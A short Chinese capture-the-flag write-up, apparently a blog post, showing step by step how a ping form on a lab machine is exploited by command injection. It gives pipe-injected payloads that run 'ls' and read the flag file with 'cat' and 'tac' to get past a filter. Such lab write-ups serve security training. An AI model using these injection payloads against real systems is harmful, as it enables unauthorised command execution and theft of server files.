题目4 命令执行(保姆级教程)

honest_gg2023-07-27 15:09

url:http://192.168.154.253:84/ #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:测试命令执行漏洞点

|---------------------------------------------------------------------------------------------------------------|
| 1、传参 8.8.8.8 |
| |

第二步:利用漏洞点拿到flag

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 猜测是执行了命令 ping 8.8.8.8 直接构建payload:ping 8.8.8.8 | ls 传参: 8.8.8.8 | ls |
| 应该是过滤了一些命令,换命令执行 执行语句: ping 8.8.8.8 | cat ../key.php 参数: 8.8.8.8 | cat ../key.php |
| 执行语句: ping 8.8.8.8 | tac ../key.php 参数: 8.8.8.8 | tac ../key.php |

相关推荐
豆是浪个32 分钟前
Linux(Centos 7.6)命令详解:sar
linux·运维·centos
fie888933 分钟前
CentOS下Bind服务的安装与故障排查
linux·运维·centos
Lin_Aries_04213 小时前
在 CentOS 9 上安装 Docker 的完整指南
linux·docker·centos
DreamLife☼3 小时前
工业领域 ACP 协议全解析:从入门到实战案例
网络·安全·ai·工业·行为·acp·管控
久绊A4 小时前
如何在Kali Linux官网下载历史版本
安全·web安全
代码的余温4 小时前
SQL Server全链路安全防护
数据库·安全·sqlserver
数据库安全4 小时前
实力登榜!美创科技荣膺数说安全《2025中国网络安全企业100强》
科技·安全·数据安全
三味神风6 小时前
Linux系统安全加固:构建云计算安全的第一道防线
安全·云计算·系统安全
startdrift11066 小时前
docker run 命令,不接it选项,run一个centos没有显示在运行,而run一个nginx却可以呢?
nginx·docker·centos
小马哥编程7 小时前
计算机网络:无线局域网加密与认证方式
网络·计算机网络·安全
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定042025高教社杯国赛数学建模选题建议+初步分析052025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定06KGG转MP3工具|非KGM文件|解密音频07UV安装并设置国内源08(E题|AI 辅助智能体测)2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合09不再让Windows更新!&Edge游戏助手卸载及关闭自动更新10奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口